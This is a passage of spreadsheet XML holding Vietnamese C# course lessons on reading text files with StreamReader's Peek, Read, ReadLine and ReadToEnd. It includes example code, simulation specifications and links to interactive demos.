```csharp
using System;
using System.IO;
public class Program
{
    public static void Main()
    {
        using var r = new StreamReader("a.txt");
        Console.WriteLine(r.Peek());          // 72   (nhìn 'H', chưa đọc)
        Console.WriteLine(r.Read());          // 72   ('H')
        Console.WriteLine(r.Read());          // 105  ('i')
        Console.WriteLine(r.Read());          // 10   (ký tự xuống dòng)
        Console.WriteLine((char)r.Read());    // O
        Console.WriteLine((char)r.Read());    // K
        Console.WriteLine(r.Read());          // -1   (hết tệp)
        Console.WriteLine(r.EndOfStream);     // True
    }
}
```
Các bài sau sẽ dạy `ReadLine()` và `ReadToEnd()` để đọc cả dòng hoặc cả tệp.
## Hoạt động: Con trỏ đọc
Mô phỏng dưới đây chạy đúng chương trình trên với tệp `a.txt` có nội dung `Hi` xuống dòng `OK`. Hình minh họa là dãy ô ký tự (dấu ↵ là ký tự xuống dòng), một tam giác chỉ vị trí con trỏ và bảng hiển thị "Vị trí con trỏ" cùng "Giá trị vừa trả về". Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Đọc từng ký tự**. Sau khi `new StreamReader` mở tệp, con trỏ đứng ở ký tự đầu tiên.
- `Peek()` trả về 72 (mã của `H`) nhưng con trỏ **đứng yên**, chưa có ô nào chuyển xanh.
- `Read()` trả về 72 rồi con trỏ tiến sang `i`, ô `H` chuyển xanh. Hai lần `Read()` tiếp theo trả về 105 (`i`) rồi 10 (ký tự xuống dòng).
- Hai lần `Read()` có ép kiểu `(char)` in ra `O` và `K`. Con trỏ đi qua ký tự cuối.
- `Read()` ở cuối tệp trả về `-1`, con trỏ nằm ở ô "hết". `EndOfStream` cho kết quả `True`.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/doc-va-ghi-file-van-ban/doc-file-van-ban/gioi-thieu-lop-streamreader/" title="Giới thiệu lớp StreamReader" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: `Peek()` nhìn trước và không di chuyển, `Read()` đọc rồi tiến một ký tự, và hết tệp thì `Read()` trả về `-1`.
## Tóm tắt
- `StreamReader` đọc **ký tự** trên nền một `Stream`, tự đổi byte thành ký tự theo mã hóa.
- Khởi tạo từ đường dẫn hoặc từ `Stream`, có thể kèm `Encoding`.
- Mặc định là UTF-8 và có kiểm tra BOM; nên lưu và đọc tệp bằng UTF-8.
- `Peek()` nhìn trước, `Read()` đọc và tiến; cả hai trả về `-1` khi hết tệp.
- `StreamReader` là `IDisposable`: dùng `using` để đóng tệp, stream cơ sở cũng đóng theo.</t>
        </is>
      </c>
    </row>
    <row r="34" ht="409.6" customHeight="1" s="18">
      <c r="A34" s="10" t="n">
        <v>34</v>
      </c>
      <c r="B34" s="10" t="inlineStr">
        <is>
          <t>4. Đọc và Ghi File Văn bản</t>
        </is>
      </c>
      <c r="C34" s="10" t="inlineStr">
        <is>
          <t>Đọc File Văn bản</t>
        </is>
      </c>
      <c r="D34" s="10" t="inlineStr">
        <is>
          <t>Đọc từng dòng với ReadLine()</t>
        </is>
      </c>
      <c r="E34" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F34" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G34" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H34" s="10" t="inlineStr">
        <is>
          <t>Thấy vòng lặp while ((line = reader.ReadLine()) != null) đọc từng dòng và dừng khi gặp null.</t>
        </is>
      </c>
      <c r="I34" s="10" t="inlineStr">
        <is>
          <t>1 cột</t>
        </is>
      </c>
      <c r="J34" s="10" t="inlineStr">
        <is>
          <t>Trình xem tệp có số dòng; con trỏ dòng ▶ nhảy từng dòng; ô biến line và count; console in dần. Bước cuối ô line hiện null, con trỏ ở sau dòng cuối.</t>
        </is>
      </c>
      <c r="K34" s="10" t="inlineStr">
        <is>
          <t>H12</t>
        </is>
      </c>
      <c r="L34" s="10" t="inlineStr">
        <is>
          <t>1 tab</t>
        </is>
      </c>
      <c r="M34" s="10" t="inlineStr">
        <is>
          <t>Tệp diem.txt có 4 dòng (dòng 3 trống).
Lần 1: line = "An,8", count = 1, in ra.
Lần 2: "Bình,6".
Lần 3: line = "" (chuỗi rỗng, không phải null) → vòng lặp vẫn tiếp tục.
Lần 4: "Chi,9".
Lần 5: line = null → điều kiện sai, thoát vòng lặp. Xong: đã đọc 4 dòng.</t>
        </is>
      </c>
      <c r="N34" s="10" t="inlineStr">
        <is>
          <t>diem.txt: An,8 / Bình,6 / (trống) / Chi,9</t>
        </is>
      </c>
      <c r="O34" s="10" t="inlineStr">
        <is>
          <t>ReadLine trả "" cho dòng trống và null khi hết tệp; phải kiểm tra null để dừng.</t>
        </is>
      </c>
      <c r="P34" s="10" t="n"/>
      <c r="Q34" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/doc-va-ghi-file-van-ban/doc-file-van-ban/doc-tung-dong-voi-readline/index.html</t>
        </is>
      </c>
      <c r="R34" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/doc-va-ghi-file-van-ban/doc-file-van-ban/doc-tung-dong-voi-readline/</t>
        </is>
      </c>
      <c r="S34" s="10" t="n"/>
      <c r="T34" s="12" t="n"/>
      <c r="U34" s="12" t="n"/>
      <c r="V34" s="21" t="inlineStr">
        <is>
          <t>Đọc từng Dòng với ReadLine()
Trong lập trình C#, khi cần xử lý dữ liệu từ file văn bản theo từng dòng riêng biệt, phương thức ReadLine() của lớp StreamReader là lựa chọn lý tưởng. Phương thức này cho phép bạn đọc nội dung của file một cách có kiểm soát, từng dòng một, rất phù hợp cho các tác vụ như phân tích file log, đọc file cấu hình, hoặc xử lý các tập dữ liệu lớn mà không cần tải toàn bộ vào bộ nhớ cùng lúc.
Nếu bạn chưa quen với StreamReader, hãy tham khảo bài "Giới thiệu lớp StreamReader" để hiểu rõ hơn về cách nó hoạt động như một cầu nối giữa chương trình của bạn và file văn bản.
Phương thức ReadLine(): Đọc Từng Dòng Một
Phương thức ReadLine() thực hiện chính xác như tên gọi của nó: đọc một dòng ký tự từ luồng hiện tại và trả về dòng đó dưới dạng một chuỗi (string). Điều quan trọng cần nhớ là dòng được đọc sẽ bao gồm tất cả các ký tự cho đến ký tự kết thúc dòng (ví dụ: \n hoặc \r\n), nhưng bản thân ký tự kết thúc dòng sẽ không được bao gồm trong chuỗi trả về. Sau khi đọc một dòng, vị trí của luồng sẽ tự động được di chuyển đến đầu dòng tiếp theo.
Đặc điểm quan trọng nhất của ReadLine():
Nó trả về một string chứa nội dung của dòng.
Khi nó đọc đến cuối của file (End Of Stream), nó sẽ trả về giá trị null. Đây là dấu hiệu quan trọng để chúng ta biết khi nào nên dừng việc đọc file.
Hãy xem một ví dụ đơn giản về cách đọc một dòng đầu tiên từ một file:
using System;
using System.IO;
public class DocMotDong
{
    public static void Main(string[] args)
    {
        string filePath = "myFile.txt"; // Giả sử file này đã tồn tại
        // Tạo một file ví dụ nếu chưa có
        if (!File.Exists(filePath))
        {
            File.WriteAllText(filePath, "Đây là dòng đầu tiên.\nĐây là dòng thứ hai.\nĐây là dòng cuối cùng.");
        }
        try
        {
            using (StreamReader reader = new StreamReader(filePath))
            {
                string firstLine = reader.ReadLine();
                Console.WriteLine($"Dòng đầu tiên: {firstLine}");
            }
        }
        catch (FileNotFoundException)
        {
            Console.WriteLine($"Lỗi: Không tìm thấy file tại đường dẫn '{filePath}'");
        }
        catch (IOException ex)
        {
            Console.WriteLine($"Đã xảy ra lỗi IO: {ex.Message}");
        }
    }
}
Trong ví dụ trên, chúng ta sử dụng khối using để đảm bảo StreamReader được đóng và giải phóng tài nguyên đúng cách ngay cả khi có lỗi xảy ra. Sau khi gọi ReadLine() lần đầu, biến firstLine sẽ chứa "Đây là dòng đầu tiên.". Nếu gọi ReadLine() thêm lần nữa, nó sẽ đọc dòng thứ hai.
Đọc Toàn Bộ File với ReadLine() và Vòng Lặp While
Để đọc toàn bộ nội dung của một file văn bản theo từng dòng, chúng ta sẽ kết hợp phương thức ReadLine() với một vòng lặp while. Như đã đề cập, ReadLine() sẽ trả về null khi không còn dòng nào để đọc nữa (tức là đã đến cuối file). Chúng ta sẽ tận dụng điều này làm điều kiện dừng cho vòng lặp.
Đây là mẫu phổ biến và hiệu quả để đọc file từng dòng:
using System;
using System.IO;
public class DocToanBoFile
{
    public static void Main(string[] args)
    {
        string filePath = "example.txt"; // Tên file ví dụ
        // Tạo một file ví dụ với nhiều dòng
        if (!File.Exists(filePath))
        {
            File.WriteAllLines(filePath, new string[]
            {
                "Chào mừng bạn đến với khóa học C# Ứng dụng!",
                "Đây là một dòng ví dụ.",
                "Mỗi dòng có thể chứa thông tin khác nhau.",
                "Hãy thử nghiệm với các file của riêng bạn."
            });
        }
        Console.WriteLine($"Đang đọc nội dung file: {filePath}");
        try
        {
            using (StreamReader reader = new StreamReader(filePath))
            {
                string line;
                int lineNumber = 1;
                // Vòng lặp sẽ tiếp tục cho đến khi ReadLine() trả về null (cuối file)
                while ((line = reader.ReadLine()) != null)
                {
                    Console.WriteLine($"Dòng {lineNumber}: {line}");
                    lineNumber++;
                    // Tại đây, bạn có thể xử lý biến 'line' theo ý muốn
                    // Ví dụ: phân tích cú pháp, lưu vào danh sách, lọc dữ liệu, v.v.
                }
            }
            Console.WriteLine("Đã đọc xong toàn bộ file.");
        }
        catch (FileNotFoundException)
        {
            Console.WriteLine($"Lỗi: Không tìm thấy file tại đường dẫn '{filePath}'");
        }
        catch (IOException ex)
        {
            Console.WriteLine($"Đã xảy ra lỗi IO: {ex.Message}");
        }
    }
}
Trong đoạn mã trên:
Chúng ta khai báo một biến string line bên ngoài vòng lặp để lưu trữ từng dòng được đọc.
Điều kiện của vòng lặp while ((line = reader.ReadLine()) != null) là một kỹ thuật viết tắt rất phổ biến trong C#:
Nó gán giá trị trả về của reader.ReadLine() vào biến line.
Sau đó, nó kiểm tra xem giá trị của line có khác null hay không.
Nếu line không phải null (tức là vẫn còn dòng để đọc), vòng lặp tiếp tục.
Nếu line là null (đã đến cuối file), vòng lặp sẽ dừng lại.
Bên trong vòng lặp, chúng ta có thể thực hiện bất kỳ thao tác xử lý nào với biến line (ví dụ: in ra màn hình, phân tích cú pháp, lưu trữ vào cấu trúc dữ liệu, v.v.).
Ứng dụng của ReadLine() trong thực tế
Phương thức ReadLine() là công cụ vô cùng mạnh mẽ và linh hoạt, được ứng dụng rộng rãi trong nhiều tình huống:
1. Đọc File Cấu Hình (Configuration Files)
Nhiều ứng dụng sử dụng file văn bản đơn giản (ví dụ: .ini, .cfg, hoặc .txt tùy chỉnh) để lưu trữ các thiết lập và cấu hình. Các file này thường có định dạng key-value (khóa-giá trị) trên mỗi dòng.
Ví dụ:
DatabaseServer=localhost
DatabaseName=ProductionDB
Port=5432
Username=admin
Sử dụng ReadLine(), bạn có thể đọc từng dòng, sau đó phân tích cú pháp mỗi dòng (ví dụ: dùng string.Split('=')) để trích xuất khóa và giá trị tương ứng, từ đó cấu hình ứng dụng của mình.
2. Đọc File Log (Log Files)
File log ghi lại các sự kiện, lỗi, cảnh báo hoặc thông tin hoạt động của ứng dụng theo trình tự thời gian, với mỗi sự kiện thường chiếm một dòng.
Ví dụ:
2023-10-27 10:30:05 INFO Application started successfully.
2023-10-27 10:30:10 WARN Database connection lost. Retrying...
2023-10-27 10:30:15 ERROR Failed to process request for UserID: 123.
Khi cần kiểm tra, phân tích hoặc lọc thông tin từ file log, ReadLine() cho phép bạn duyệt qua từng dòng log, tìm kiếm các từ khóa cụ thể (ví dụ: "ERROR"), hoặc lọc theo thời gian mà không cần tải toàn bộ file log khổng lồ vào bộ nhớ. Điều này đặc biệt quan trọng với các hệ thống lớn có file log lên đến hàng GB.
3. Xử lý Dữ liệu Lớn theo Dòng
Đối với các file dữ liệu lớn (ví dụ: CSV đơn giản, danh sách các mục, v.v.) mà việc tải toàn bộ vào bộ nhớ có thể gây tràn bộ nhớ (OutOfMemoryException), ReadLine() cho phép bạn xử lý dữ liệu theo từng "chunk" (từng dòng), giảm thiểu mức tiêu thụ tài nguyên. Bạn có thể đọc một dòng, xử lý nó, sau đó vứt bỏ nó trước khi đọc dòng tiếp theo.
Khi nào nên dùng ReadLine() thay vì ReadToEnd()?
Bạn có thể đã tìm hiểu về phương thức ReadToEnd() trong bài đọc trước, cho phép đọc toàn bộ nội dung file vào một chuỗi duy nhất. Vậy khi nào nên chọn ReadLine()?
Sử dụng ReadLine() khi:
Bạn cần xử lý file từng dòng một.
File có kích thước rất lớn và bạn không muốn tải toàn bộ vào bộ nhớ cùng lúc để tránh lãng phí tài nguyên hoặc lỗi tràn bộ nhớ.
Bạn cần thực hiện các thao tác dừng đọc sớm (ví dụ: tìm thấy thông tin cần thiết và không cần đọc tiếp).
Bạn cần phân tích cú pháp hoặc sửa đổi nội dung của từng dòng riêng biệt.
Sử dụng ReadToEnd() khi:
File có kích thước nhỏ và bạn cần toàn bộ nội dung dưới dạng một chuỗi duy nhất để xử lý (ví dụ: hiển thị lên giao diện người dùng, tìm kiếm đơn giản).
Sự đơn giản và hiệu quả của việc đọc một lần là ưu tiên hàng đầu.
Nắm vững phương thức ReadLine() và cách sử dụng nó với vòng lặp while sẽ trang bị cho bạn một kỹ năng quan trọng để làm việc hiệu quả với các file văn bản trong ứng dụng C# của mình.</t>
        </is>
      </c>
      <c r="W34" s="22" t="inlineStr">
        <is>
          <t># Đọc từng dòng với ReadLine()
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Giải thích `ReadLine()` trả về gì cho mỗi lần gọi và khi nào trả về `null`.
- Viết vòng lặp `while ((line = reader.ReadLine()) != null)` để đọc hết một tệp văn bản.
- Phân biệt dòng trống (chuỗi rỗng `""`) với kết thúc tệp (`null`).
- Chọn `ReadLine()` hay `ReadToEnd()` cho từng tình huống.
- Quan sát từng vòng lặp đọc tệp `diem.txt` bằng hoạt động mô phỏng.
## Phương thức ReadLine()
Khi cần xử lý tệp văn bản theo từng dòng riêng biệt, ta dùng phương thức `ReadLine()` của lớp `StreamReader`. Mỗi lần gọi, nó:
- Đọc **một dòng** ký tự rồi trả về dưới dạng `string`.
- **Không** đưa ký tự xuống dòng (`\n` hoặc `\r\n`) vào chuỗi trả về.
- Tự di chuyển vị trí đọc sang đầu dòng kế tiếp.
- Trả về **`null`** khi đã hết tệp (End Of Stream).
Giá trị `null` là dấu hiệu duy nhất để biết lúc nào nên dừng đọc.
Ví dụ đọc đúng một dòng đầu tiên:
```csharp
using System;
using System.IO;
public class Program
{
    public static void Main()
    {
        File.WriteAllText("demo.txt", "Dòng một\nDòng hai\nDòng ba");
        using (StreamReader reader = new StreamReader("demo.txt"))
        {
            string firstLine = reader.ReadLine();
            Console.WriteLine(firstLine);   // Dòng một
        }
    }
}
```
Khối `using` bảo đảm `StreamReader` luôn được đóng, kể cả khi có lỗi. Nếu gọi `ReadLine()` thêm lần nữa, bạn sẽ nhận "Dòng hai".
## Đọc hết tệp bằng vòng lặp while
Để đọc toàn bộ tệp, ta kết hợp `ReadLine()` với vòng lặp `while` và dùng `null` làm điều kiện dừng. Giả sử tệp `diem.txt` có bốn dòng, trong đó dòng 3 để trống:
```
An,8
Bình,6
Chi,9
```
```csharp
using System;
using System.IO;
public class Program
{
    public static void Main()
    {
        using var r = new StreamReader("diem.txt");
        string line;
        int count = 0;
        while ((line = r.ReadLine()) != null)
        {
            count++;
            Console.WriteLine(line);
        }
        Console.WriteLine(count);
    }
}
// Kết quả:
// An,8
// Bình,6
//                (dòng trống)
// Chi,9
// 4
```
Điều kiện `(line = r.ReadLine()) != null` là cách viết gọn rất quen thuộc trong C#. Nó làm ba việc theo thứ tự:
1. Gọi `ReadLine()` và gán kết quả vào `line`.
2. So sánh `line` với `null`.
3. Nếu khác `null` thì chạy thân vòng lặp, nếu bằng `null` thì thoát.
### Dòng trống không phải là hết tệp
Dòng 3 không có chữ nào, nên `ReadLine()` trả về **chuỗi rỗng** `""`. Chuỗi rỗng **khác** `null`, vì vậy vòng lặp vẫn chạy tiếp và dòng trống vẫn được đếm. Chỉ khi hết tệp, `ReadLine()` mới trả về `null`.
| Giá trị trả về | Ý nghĩa | Vòng lặp |
|---|---|---|
| `"An,8"` | Một dòng có chữ | Tiếp tục |
| `""` | Dòng trống | Tiếp tục |
| `null` | Hết tệp | Dừng |
&gt; **Lưu ý:** Dùng `using` (hoặc `using var`) để `StreamReader` tự đóng. Quên đóng tệp có thể làm tệp bị khóa, gây lỗi cho các thao tác khác.
## Hoạt động: Đọc tệp diem.txt từng vòng
Mô phỏng dưới đây chạy đúng vòng lặp ở trên trên tệp `diem.txt`. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Đọc tệp diem.txt**. Tệp có 4 dòng: `An,8`, `Bình,6`, một dòng trống và `Chi,9`, kèm một dòng ghi "(hết tệp)" ở cuối. Ban đầu con trỏ ở đầu dòng 1 và `count` bằng 0.
- Bấm qua lần 1 và lần 2. `ReadLine()` trả về `"An,8"` rồi `"Bình,6"`, điều kiện `!= null` đúng, `count` tăng lên 1 rồi 2 và mỗi dòng được in ra. Hãy nhìn thẻ `line` và thẻ `count` trong hình minh họa thay đổi theo từng vòng.
- Bấm tiếp lần 3. Đây là dòng trống: `ReadLine()` trả về chuỗi rỗng `""`, không phải `null`, nên vòng lặp vẫn tiếp tục và `count` lên 3.
- Bấm lần 4: đọc `"Chi,9"`, `count` lên 4.
- Bấm lần 5. Không còn dòng nào, `ReadLine()` trả về `null`, thẻ `line` chuyển sang màu đỏ và vòng lặp dừng.
- Bước cuối in `count` ra. Kết quả là 4 dòng, tính cả dòng trống.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/doc-va-ghi-file-van-ban/doc-file-van-ban/doc-tung-dong-voi-readline/" title="Đọc từng dòng với ReadLine()" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: `ReadLine()` trả về `""` cho dòng trống và `null` khi hết tệp. Phải kiểm tra `null` (không phải chuỗi rỗng) để biết khi nào dừng vòng lặp.
## Ứng dụng của ReadLine()
Đọc từng dòng phù hợp với nhiều loại tệp mà mỗi dòng là một đơn vị dữ liệu:
- **Tệp cấu hình:** mỗi dòng là một cặp `key=value`, ví dụ `Port=5432`. Đọc từng dòng rồi tách bằng `Split('=')`.
- **Tệp nhật ký (log):** mỗi dòng là một sự kiện. Bạn có thể tìm các dòng chứa `"ERROR"` mà không cần nạp cả tệp hàng GB vào bộ nhớ.
- **Dữ liệu lớn:** đọc một dòng, xử lý, bỏ đi rồi mới đọc dòng kế, nên tốn ít bộ nhớ.
### Khi nào dùng ReadLine(), khi nào dùng ReadToEnd()?
| Dùng `ReadLine()` khi | Dùng `ReadToEnd()` khi |
|---|---|
| Cần xử lý từng dòng riêng | Cần cả nội dung là một chuỗi |
| Tệp lớn, không muốn nạp hết vào bộ nhớ | Tệp nhỏ |
| Muốn dừng đọc sớm khi đã thấy dữ liệu cần | Muốn đọc một lần cho đơn giản |
## Tóm tắt
- `ReadLine()` trả về một dòng dạng `string`, không kèm ký tự xuống dòng.
- Khi hết tệp, `ReadLine()` trả về `null`.
- Mẫu `while ((line = reader.ReadLine()) != null)` đọc hết tệp từng dòng một.
- Dòng trống cho ra chuỗi rỗng `""`, khác `null`, nên vòng lặp không dừng ở đó.
- Dùng `using` để `StreamReader` luôn được đóng.
- Tệp lớn hoặc cần xử lý theo dòng thì chọn `ReadLine()`, tệp nhỏ cần cả chuỗi thì chọn `ReadToEnd()`.</t>
        </is>
      </c>
    </row>
    <row r="35" ht="409.6" customHeight="1" s="18">
      <c r="A35" s="10" t="n">
        <v>35</v>
      </c>
      <c r="B35" s="10" t="inlineStr">
        <is>
          <t>4. Đọc và Ghi File Văn bản</t>
        </is>
      </c>
      <c r="C35" s="10" t="inlineStr">
        <is>
          <t>Đọc File Văn bản</t>
        </is>
      </c>
      <c r="D35" s="10" t="inlineStr">
        <is>
          <t>Đọc toàn bộ nội dung với ReadToEnd() và các phương thức đọc khác</t>
        </is>
      </c>
      <c r="E35" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F35" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G35" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H35" s="10" t="inlineStr">
        <is>
          <t>So sánh hình dạng kết quả của các cách đọc toàn bộ tệp.</t>
        </is>
      </c>
      <c r="I35" s="10" t="inlineStr">
        <is>
          <t>1 cột, 3 tab</t>
        </is>
      </c>
      <c r="J35" s="10" t="inlineStr">
        <is>
          <t>Cùng một tệp 3 dòng ở trên. Kết quả ở dưới đổi theo tab: ReadToEnd → một chuỗi dài có ký hiệu ↵; ReadAllLines → mảng 3 ô; ReadLines → băng chuyền đưa từng dòng vào foreach (đọc đến đâu lấy đến đó).</t>
        </is>
      </c>
      <c r="K35" s="10" t="inlineStr">
        <is>
          <t>H12, H01</t>
        </is>
      </c>
      <c r="L35" s="10" t="inlineStr">
        <is>
          <t>ReadToEnd | File.ReadAllLines | File.ReadLines</t>
        </is>
      </c>
      <c r="M35" s="10" t="inlineStr">
        <is>
          <t>ReadToEnd: cả tệp vào một string, độ dài tính cả ký tự xuống dòng.
ReadAllLines: mảng string[3], ký tự xuống dòng bị bỏ.
ReadLines: foreach lấy dòng 1, xử lý xong mới đọc dòng 2... Có thể break sớm mà không đọc phần còn lại.
Bước cuối mỗi tab: khi nào nên dùng.</t>
        </is>
      </c>
      <c r="N35" s="10" t="inlineStr">
        <is>
          <t>Tệp 3 dòng</t>
        </is>
      </c>
      <c r="O35" s="10" t="inlineStr">
        <is>
          <t>Tệp nhỏ: ReadAllText/ReadAllLines cho tiện. Tệp lớn: ReadLine hoặc File.ReadLines để không nạp hết vào bộ nhớ.</t>
        </is>
      </c>
      <c r="P35" s="10" t="inlineStr">
        <is>
          <t>Xuống dòng là \r\n trên Windows, \n trên macOS/Linux.</t>
        </is>
      </c>
      <c r="Q35" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/doc-va-ghi-file-van-ban/doc-file-van-ban/doc-toan-bo-noi-dung-voi-readtoend-va-cac-phuong-thuc-doc-khac/index.html</t>
        </is>
      </c>
      <c r="R35" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/doc-va-ghi-file-van-ban/doc-file-van-ban/doc-toan-bo-noi-dung-voi-readtoend-va-cac-phuong-thuc-doc-khac/</t>
        </is>
      </c>
      <c r="S35" s="10" t="n"/>
      <c r="T35" s="12" t="n"/>
      <c r="U35" s="12" t="n"/>
      <c r="V35" s="21" t="inlineStr">
        <is>
          <t>Đọc Toàn Bộ Nội Dung File với ReadToEnd()
Trong bài học trước, bạn đã làm quen với lớp StreamReader và phương thức ReadLine() để đọc file văn bản theo từng dòng. Tuy nhiên, đôi khi chúng ta cần đọc toàn bộ nội dung của một file văn bản vào bộ nhớ dưới dạng một chuỗi duy nhất. Đây là lúc phương thức ReadToEnd() phát huy tác dụng.
Phương thức ReadToEnd(): Đọc Toàn Bộ File
Phương thức ReadToEnd() của lớp StreamReader được thiết kế để đọc tất cả các ký tự từ vị trí hiện tại của con trỏ đọc cho đến cuối luồng (stream) và trả về chúng dưới dạng một chuỗi string duy nhất.
Khi nào nên sử dụng ReadToEnd()?
File nhỏ: Rất phù hợp với các file có kích thước nhỏ (vài KB đến vài MB) mà bạn cần xử lý toàn bộ nội dung cùng một lúc. Ví dụ: file cấu hình, file cài đặt nhỏ, hoặc các file văn bản đơn giản.
Cần toàn bộ nội dung dưới dạng chuỗi: Khi bạn muốn thao tác với toàn bộ văn bản như một khối duy nhất, chẳng hạn như tìm kiếm, thay thế, hoặc hiển thị toàn bộ nội dung lên giao diện người dùng.
Lưu ý quan trọng:
ReadToEnd() tải toàn bộ nội dung file vào bộ nhớ. Với các file rất lớn (hàng trăm MB hoặc GB), việc sử dụng ReadToEnd() có thể gây ra lỗi OutOfMemoryException hoặc làm chậm đáng kể hiệu suất ứng dụng do tiêu tốn quá nhiều tài nguyên bộ nhớ. Trong những trường hợp đó, việc đọc từng dòng với ReadLine() hoặc đọc từng khối với Read(char[] buffer, ...) sẽ là lựa chọn tốt hơn.
Ví dụ về ReadToEnd():
Hãy xem xét một ví dụ đơn giản về cách đọc toàn bộ nội dung của một file văn bản. Giả sử chúng ta có một file tên data.txt với nội dung như sau:
Tên: Nguyễn Văn A
Tuổi: 30
Nghề nghiệp: Lập trình viên
Để đọc toàn bộ nội dung này:
using System;
using System.IO;
public class ReadAllContent
{
    public static void Main(string[] args)
    {
        string filePath = "data.txt"; // Đảm bảo file này tồn tại trong cùng thư mục với chương trình
        try
        {
            // Sử dụng "using" để đảm bảo StreamReader được đóng đúng cách
            using (StreamReader sr = new StreamReader(filePath))
            {
                string fullContent = sr.ReadToEnd();
                Console.WriteLine("Nội dung đầy đủ của file:");
                Console.WriteLine(fullContent);
            }
        }
        catch (FileNotFoundException)
        {
            Console.WriteLine($"Lỗi: Không tìm thấy file tại '{filePath}'");
        }
        catch (Exception ex)
        {
            Console.WriteLine($"Đã xảy ra lỗi: {ex.Message}");
        }
    }
}
Kết quả đầu ra sẽ là:
Nội dung đầy đủ của file:
Tên: Nguyễn Văn A
Tuổi: 30
Nghề nghiệp: Lập trình viên
Đọc Ký Tự hoặc Khối Ký Tự với Read() và Read(char[] buffer, ...)
Ngoài ReadToEnd() và ReadLine(), lớp StreamReader còn cung cấp các phương thức cấp thấp hơn để đọc dữ liệu: Read() và Read(char[] buffer, int index, int count). Các phương thức này cho phép bạn kiểm soát chi tiết hơn quá trình đọc, hữu ích cho các tác vụ phân tích cú pháp tùy chỉnh hoặc khi tài nguyên bộ nhớ rất hạn chế.
Phương thức Read(): Đọc Từng Ký Tự
Phương thức Read() đọc ký tự tiếp theo từ luồng đầu vào và di chuyển con trỏ đọc tiến một vị trí. Nó trả về một giá trị int đại diện cho mã ký tự đã đọc, hoặc -1 nếu đã đạt đến cuối luồng.
Ví dụ về Read():
using System;
using System.IO;
public class ReadCharByChar
{
    public static void Main(string[] args)
    {
        string filePath = "sample.txt"; // Giả sử file này có nội dung "Hello World"
        try
        {
            using (StreamReader sr = new StreamReader(filePath))
            {
                Console.WriteLine("Đọc từng ký tự:");
                int charCode;
                while ((charCode = sr.Read()) != -1)
                {
                    Console.Write((char)charCode); // Chuyển đổi mã ký tự sang ký tự thực
                }
                Console.WriteLine();
            }
        }
        catch (Exception ex)
        {
            Console.WriteLine($"Đã xảy ra lỗi: {ex.Message}");
        }
    }
}
Nếu sample.txt chứa "Hello World", đầu ra sẽ là:
Đọc từng ký tự:
Hello World
Phương thức Read(char[] buffer, int index, int count): Đọc Khối Ký Tự
Phương thức Read(char[] buffer, int index, int count) đọc một số lượng ký tự tối đa được chỉ định (count) từ luồng và lưu trữ chúng vào một mảng ký tự (buffer), bắt đầu từ vị trí index trong mảng. Nó trả về số lượng ký tự thực sự đã đọc. Số lượng ký tự này có thể ít hơn count nếu đã đạt đến cuối luồng.
Phương pháp này rất hiệu quả khi bạn cần xử lý các file lớn theo từng khối (chunk) để tiết kiệm bộ nhớ, thay vì tải toàn bộ file vào RAM cùng một lúc.
Ví dụ về Read(char[] buffer, ...):
using System;
using System.IO;
using System.Text; // Để sử dụng StringBuilder
public class ReadBlockOfChars
{
    public static void Main(string[] args)
    {
        string filePath = "large_sample.txt"; // Giả sử file này có nội dung dài hơn một chút
        try
        {
            using (StreamReader sr = new StreamReader(filePath))
            {
                char[] buffer = new char[10]; // Đọc 10 ký tự mỗi lần
                int charsRead;
                StringBuilder sb = new StringBuilder();
                Console.WriteLine("Đọc từng khối 10 ký tự:");
                while ((charsRead = sr.Read(buffer, 0, buffer.Length)) &gt; 0)
                {
                    // Chuyển đổi phần đã đọc của buffer thành chuỗi và thêm vào StringBuilder
                    sb.Append(buffer, 0, charsRead);
                    Console.WriteLine($"Đã đọc {charsRead} ký tự: '{new string(buffer, 0, charsRead)}'");
                }
                Console.WriteLine("\n--- Nội dung đầy đủ đã đọc ---");
                Console.WriteLine(sb.ToString());
            }
        }
        catch (Exception ex)
        {
            Console.WriteLine($"Đã xảy ra lỗi: {ex.Message}");
        }
    }
}
Nếu large_sample.txt có nội dung "This is a longer text file for demonstration.", đầu ra có thể trông như sau:
Đọc từng khối 10 ký tự:
Đã đọc 10 ký tự: 'This is a '
Đã đọc 10 ký tự: 'longer tex'
Đã đọc 10 ký tự: 't file for'
Đã đọc 6 ký tự: ' demon'
--- Nội dung đầy đủ đã đọc ---
This is a longer text file for demonstration.
So Sánh Hiệu Suất và Trường Hợp Sử Dụng của Các Phương Thức Đọc
Việc lựa chọn phương thức đọc file phù hợp có ảnh hưởng lớn đến hiệu suất và mức độ tiêu thụ bộ nhớ của ứng dụng. Dưới đây là bảng so sánh tóm tắt:
Tóm tắt khuyến nghị:
File nhỏ (&lt; vài MB) và bạn cần toàn bộ nội dung: Sử dụng ReadToEnd().
File lớn hoặc bạn cần xử lý dữ liệu theo từng dòng: Sử dụng ReadLine() (như đã học trong bài trước).
File rất lớn hoặc bạn cần kiểm soát chi tiết quá trình đọc để tối ưu bộ nhớ/hiệu suất, hoặc cần phân tích cú pháp phức tạp: Sử dụng Read(char[] buffer, ...) hoặc Read().
Hiểu rõ các phương thức này sẽ giúp bạn xây dựng các ứng dụng C# hiệu quả và mạnh mẽ hơn khi làm việc với hệ thống file.</t>
        </is>
      </c>
      <c r="W35" s="22" t="inlineStr">
        <is>
